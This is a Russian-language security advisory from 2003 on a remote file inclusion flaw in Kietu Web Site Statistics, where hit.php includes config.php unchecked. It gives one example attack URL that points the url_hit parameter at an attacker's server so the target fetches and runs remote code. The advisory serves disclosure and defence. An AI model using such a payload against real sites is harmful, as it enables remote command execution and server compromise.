Выполнение произвольных команд в 'Kietu?'

Дата публикации:
20.02.2003
Дата изменения:
17.10.2006
Всего просмотров:
681
Опасность:
Высокая
Наличие исправления:
Частично
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Kietu 2.x
Kietu 3.x
Описание: Уязвимость включения файла обнаружена в программе 'Kietu?' Web Site Statistics. Удаленный пользователь может выполнять произвольные команды на операционной системе.

Файл 'hit.php' включает файл 'config.php', не подтверждая правильности включенного файла. В результате удаленный атакующий может сконструировать URL, который ссылается на другой файл 'config.php', расположенный на удаленном сервере. Этот файл будет включен и выполнен целевым сервером. Пример:

http://[target]/hit.php?url_hit=http://[attacker]/
Уязвимость обнаружена в 'Kietu?' Web Site Statistics 2.0, 2.3

Ссылки: [VulnWatch] Kietu ( PHP )
или введите имя

CAPTCHA